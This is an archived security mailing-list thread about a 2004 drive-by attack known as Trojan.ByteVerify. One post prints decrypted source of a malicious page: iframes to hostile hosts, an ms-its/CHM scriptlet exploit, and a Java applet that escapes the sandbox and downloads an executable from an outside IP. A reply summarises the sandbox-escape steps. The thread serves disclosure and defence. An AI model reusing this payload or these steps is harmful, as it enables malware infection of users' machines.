In-Reply-To: <116798078.20041230073423@gmx.net>
so far, anyone knows how to protect from this crap?
Update your Windows and your antivirus software !
this attack is known as "Trojan.ByteVerify". It exploits the "Internet
Explorer/Outlook CHM File Processing Arbitrary Code Execution Vulnerability
(MS04-013)" and the "Microsoft virtual machine Remote Code execution flaw
(MS03-011)".
<Symantec>
When Trojan.ByteVerify is executed, it performs the following actions:
Escapes the sandbox restrictions, using Blackbox.class, by doing the following:
Declares a new PermissionDataSet with setFullyTrusted set to TRUE.
Creates a trusted PermissionSet.
Sets permission to PermissionSet by creating its own URLClassLoader class,
derived from the VerifierBug.class.
Loads Beyond.class using the URLClassLoader from Blackbox.class.
Gains unrestricted rights on the local machine by invoking the
.assertPermission method of the PolicyEngine class in Beyond.class.
[...]
May attempt to retrieve dialer programs and install them on the infected
computer. The dialer programs may attempt to connect the infected computer to
pornographic Web sites.
Threat Known As :
Exploit-ByteVerify [McAfee]
Trojan.ByteVerify [Symantec]
Exploit.Java.Bytverify [KAV]
JAVA_BYTVERIFY.A [Trend]
Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com
Hi People,
before reading this,
dont go on any of the sites
unless you are sure ;)
after decrypting some stuff, this is the source from:
http://xxl-size.com/cogo.html
-------------------------------------
<iframe src="http://209.8.20.130/dl/adv346.php";>
<iframe src="http://www.awmcash.biz/adverts/14/1.htm";>
-------------------------------------
this is the source from one of the iframes
(http://209.8.20.130/dl/adv346.php):
----------------------------------------------------
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderadv346.jar
code=Counter></APPLET></body></html>
----------------------------------------------------
the jar archive loaderadv346.jar contains some java classes
which exploits the URLClassLoader bug (BlackBox.class).
it overrides the sandbox and downloads a loadadv346.exe from:
http://209.8.20.130/dl/loadadv346.exe
this seems to be a dialer or something like this,
it changes the hosts file, creates some spawn files,
you can look for yourself, i included the file
and the java stuff, the loadadv is upx'd,
so far, anyone knows how to protect from this crap?
you're welcome to send some solutions ;)
cya, Stefan
